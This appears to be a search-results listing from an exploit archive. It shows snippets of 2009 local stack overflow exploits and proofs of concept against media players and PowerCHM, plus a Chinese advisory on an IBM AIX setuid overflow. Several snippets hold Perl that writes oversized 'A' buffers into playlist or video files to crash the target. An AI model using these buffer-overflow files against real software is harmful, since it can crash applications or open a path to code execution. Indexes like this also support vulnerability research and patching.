271 matches found
Mercury Audio Player 1.21 (.m3u) Local Stack Overflow Exploit
Exploit for unknown platform in category local exploits ============================================================= Mercury Audio Player 1.21 .m3u Local Stack Overflow Exploit ============================================================= usage: exploit.py Note : Exploit take about 30 seconds to...
Mercury Audio Player 1.21 (.M3U File) Local Stack Overflow PoC
Exploit for unknown platform in category dos / poc ============================================================== Mercury Audio Player 1.21 .M3U File Local Stack Overflow PoC ============================================================== Mercury Audio Player 1.21 .M3U File Local Stack Overflow Po...
Mercury Audio Player 1.21 - .b4s Local Stack Overflow
Mercury Audio Player 1.21 - .b4s Local Stack Overflow usage: exploit.py print "" print " Mercury Audio Player 1.21 .b4s Local Stack Overflow\n" print " Refer: http://www.milw0rm.com/exploits/8578" print " Exploit code: His0k4" print " Tested on: Windows XP Pro SP3 EN\n" print " greetz: TO ELITE...
Mercury Audio Player 1.21 - .m3u Local Stack Overflow (PoC)
Mercury Audio Player 1.21 - .m3u Local Stack Overflow PoC Mercury Audio Player 1.21 .M3U File Local Stack Overflow PoC Discovered by SirGod - www.mortal-team.net my $chars= "A" x 1104; my $file="sirgod.m3u"; openmy $FILE, "$file" or die "Cannot open $file: $!"; print $FILE $chars; close$FILE; pri...
Mercury Audio Player 1.21 (.b4s) Local Stack Overflow Exploit
Exploit for unknown platform in category local exploits ============================================================= Mercury Audio Player 1.21 .b4s Local Stack Overflow Exploit ============================================================= usage: exploit.py print "" print " Mercury Audio Player...
Mercury Audio Player 1.21 - '.m3u' Local Stack Overflow (PoC)
Mercury Audio Player 1.21 .M3U File Local Stack Overflow PoC Discovered by SirGod - www.mortal-team.net my $chars= "A" x 1104; my $file="sirgod.m3u"; openmy $FILE, "$file" or die "Cannot open $file: $!"; print $FILE $chars; close$FILE; print "$file was created"; milw0rm.com 2009-04-30...
Mercury Audio Player 1.21 - '.b4s' Local Stack Overflow
usage: exploit.py print "" print " Mercury Audio Player 1.21 .b4s Local Stack Overflow\n" print " Refer: http://www.milw0rm.com/exploits/8578" print " Exploit code: His0k4" print " Tested on: Windows XP Pro SP3 EN\n" print " greetz: TO ELITE ALGERIANS,snakespc.com\n" print "" header1 =...
mpegable Player 2.12 - .yuv Local Stack Overflow (PoC)
mpegable Player 2.12 - .yuv Local Stack Overflow PoC mpegable Player 2.12 YUV File Local Stack Overflow POC my $chars= "A" x 1104; my $file="goldm.yuv"; openmy $FILE, "$file" or die "Cannot open $file: $!"; print $FILE $chars; close$FILE; print "$file has been created \n"; print "Thanx Tryag.Com"...
mpegable Player 2.12 (YUV File) Local Stack Overflow PoC
Exploit for unknown platform in category dos / poc ======================================================== mpegable Player 2.12 YUV File Local Stack Overflow PoC ======================================================== mpegable Player 2.12 YUV File Local Stack Overflow POC my $chars= "A" x 1104;...
mpegable Player 2.12 - '.yuv' Local Stack Overflow (PoC)
mpegable Player 2.12 YUV File Local Stack Overflow POC my $chars= "A" x 1104; my $file="goldm.yuv"; openmy $FILE, "$file" or die "Cannot open $file: $!"; print $FILE $chars; close$FILE; print "$file has been created \n"; print "Thanx Tryag.Com"; milw0rm.com 2009-04-29...
CoolPlayer Portable 2.19.1 (.m3u File) Local Stack Overflow PoC
No description provided by source. CoolPlayerp Portable 2.19.1 .M3U File Local Stack Overflow POC my $chars= "A" x 4104; my $file="goldm.m3u"; openmy $FILE, "$file" or die "Cannot open $file: $!"; print $FILE $chars; close$FILE; print "$file has been created \n"; print "Thanx Tryag.Com";...
Groovy Media Player 1.1.0 (.m3u File) Local Stack Overflow PoC
Exploit for unknown platform in category dos / poc ============================================================== Groovy Media Player 1.1.0 .m3u File Local Stack Overflow PoC ============================================================== my $chars= "A" x 4104; my $file="goldm.m3u"; openmy $FILE,...
Groovy Media Player 1.1.0 - .m3u Local Stack Overflow (PoC)
Groovy Media Player 1.1.0 - .m3u Local Stack Overflow PoC Groovy Media Player Version 1.1.0 .M3U File Local Stack Overflow POC my $chars= "A" x 4104; my $file="goldm.m3u"; openmy $FILE, "$file" or die "Cannot open $file: $!"; print $FILE $chars; close$FILE; print "$file has been created \n"; prin...
1by1 1.67 (.m3u File) Local Stack Overflow PoC
Exploit for unknown platform in category dos / poc...
Groovy Media Player 1.1.0 - '.m3u' Local Stack Overflow (PoC)
Groovy Media Player Version 1.1.0 .M3U File Local Stack Overflow POC my $chars= "A" x 4104; my $file="goldm.m3u"; openmy $FILE, "$file" or die "Cannot open $file: $!"; print $FILE $chars; close$FILE; print "$file has been created \n"; print "Thanx Tryag.Com"; milw0rm.com 2009-04-20...
CoolPlayer Portable 2.19.1 - '.m3u' Local Stack Overflow (PoC)
CoolPlayerp Portable 2.19.1 .M3U File Local Stack Overflow POC my $chars= "A" x 4104; my $file="goldm.m3u"; openmy $FILE, "$file" or die "Cannot open $file: $!"; print $FILE $chars; close$FILE; print "$file has been created \n"; print "Thanx Tryag.Com"; milw0rm.com 2009-04-20...
IBM AIX usr/sbin/muxatmd本地栈溢出漏洞
IBM AIX是一款商业性质的UNIX操作系统。 set-uid root二进制程序muxatmd将调用程序名称与静态字符串.pid连接到一起,而传送给连接后字符串的函数调用的目标缓冲区是固定大小的栈缓冲区。由于没有执行边界检查,如果用超长程序名参数调用了muxatmd的话就可以触发栈溢出,导致执行任意指令。 IBM AIX 6.1 IBM AIX 5.3 IBM AIX 5.2 临时解决方法: 从/usr/sbin/muxatmd二进制程序删除set-uid位。 厂商补丁: IBM --- 目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载:...
PowerCHM 5.7 - Long URL Local Stack Overflow (PoC)
PowerCHM 5.7 - Long URL Local Stack Overflow PoC PowerCHM 5.7 Long url Local stack overflow SEH POC found By SuB-ZeRo [email protected] thnaks to hisok4 Greetz:All friends and muslims HackeRs secdz.com var crash = "http://"; for i=0;iB00M!'; milw0rm.com 2009-04-14...
PowerCHM 5.7 - Long URL Local Stack Overflow (PoC)
PowerCHM 5.7 Long url Local stack overflow SEH POC found By SuB-ZeRo [email protected] thnaks to hisok4 Greetz:All friends and muslims HackeRs secdz.com var crash = "http://"; for i=0;iB00M!'; milw0rm.com 2009-04-14...
PowerCHM 5.7 (Long URL) Local Stack Overflow PoC
Exploit for unknown platform in category dos / poc ================================================ PowerCHM 5.7 Long URL Local Stack Overflow PoC ================================================ PowerCHM 5.7 Long url Local stack overflow SEH POC found By SuB-ZeRo email protected thnaks to hisok4...